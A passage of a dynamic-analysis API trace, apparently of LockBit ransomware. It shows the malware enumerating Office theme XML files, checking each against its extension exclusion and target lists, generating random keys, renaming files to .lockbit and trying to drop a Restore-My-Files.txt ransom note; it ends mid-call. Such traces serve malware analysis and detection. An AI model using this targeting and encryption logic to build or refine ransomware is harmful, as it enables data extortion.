lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.144] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.lockbit") returned 86 [0192.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.149] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.149] malloc (_Size=0x40068) returned 0x3df0008 [0192.149] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=962) returned 1 [0192.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.150] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.151] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.152] malloc (_Size=0xc2) returned 0x1fa2ed8 [0192.152] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0192.153] free (_Block=0x1fa2ed8) [0192.153] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.153] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.153] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.153] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15248e00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15248e00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Elemental.xml", cAlternateFileName="ELEMEN~1.XML")) returned 1 [0192.153] lstrcmpiW (lpString1=".", lpString2="Elemental.xml") returned -1 [0192.153] lstrcmpiW (lpString1="..", lpString2="Elemental.xml") returned -1 [0192.153] PathFindExtensionW (pszPath="Elemental.xml") returned=".xml" [0192.153] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.153] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.154] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Elemental.xml") returned 1 [0192.155] lstrcmpiW (lpString1="ntldr", lpString2="Elemental.xml") returned 1 [0192.155] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Elemental.xml") returned 1 [0192.155] lstrcmpiW (lpString1="bootsect.bak", lpString2="Elemental.xml") returned -1 [0192.155] lstrcmpiW (lpString1="autorun.inf", lpString2="Elemental.xml") returned -1 [0192.155] lstrcmpiW (lpString1="thumbs.db", lpString2="Elemental.xml") returned 1 [0192.155] lstrcmpiW (lpString1="iconcache.db", lpString2="Elemental.xml") returned 1 [0192.155] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.155] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml") returned=".xml" [0192.155] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.155] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.155] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.156] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.156] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.lockbit") returned 88 [0192.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0192.157] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.157] malloc (_Size=0x40068) returned 0x1ff1e60 [0192.157] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=964) returned 1 [0192.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0192.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0192.158] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.402] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.402] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0xc0000008 [0193.403] free (_Block=0x1fa2ed8) [0193.403] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.403] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.403] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.403] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0301b00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf0301b00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Equity.xml", cAlternateFileName="")) returned 1 [0193.403] lstrcmpiW (lpString1=".", lpString2="Equity.xml") returned -1 [0193.403] lstrcmpiW (lpString1="..", lpString2="Equity.xml") returned -1 [0193.403] PathFindExtensionW (pszPath="Equity.xml") returned=".xml" [0193.403] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.403] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.404] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Equity.xml") returned 1 [0193.405] lstrcmpiW (lpString1="ntldr", lpString2="Equity.xml") returned 1 [0193.405] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Equity.xml") returned 1 [0193.405] lstrcmpiW (lpString1="bootsect.bak", lpString2="Equity.xml") returned -1 [0193.405] lstrcmpiW (lpString1="autorun.inf", lpString2="Equity.xml") returned -1 [0193.405] lstrcmpiW (lpString1="thumbs.db", lpString2="Equity.xml") returned 1 [0193.405] lstrcmpiW (lpString1="iconcache.db", lpString2="Equity.xml") returned 1 [0193.405] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.405] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml") returned=".xml" [0193.405] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.405] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.405] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.406] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.406] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.lockbit") returned 85 [0193.406] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.408] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.408] malloc (_Size=0x40068) returned 0x3df0008 [0193.408] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=961) returned 1 [0193.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.409] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.425] malloc (_Size=0xc0) returned 0x1fa2ed8 [0193.425] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0193.429] free (_Block=0x1fa2ed8) [0193.429] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.429] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.429] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.429] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4741800, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4741800, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Essential.xml", cAlternateFileName="ESSENT~1.XML")) returned 1 [0193.429] lstrcmpiW (lpString1=".", lpString2="Essential.xml") returned -1 [0193.429] lstrcmpiW (lpString1="..", lpString2="Essential.xml") returned -1 [0193.429] PathFindExtensionW (pszPath="Essential.xml") returned=".xml" [0193.429] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.429] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.429] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.429] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.429] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".hta", lpString2=".xml") 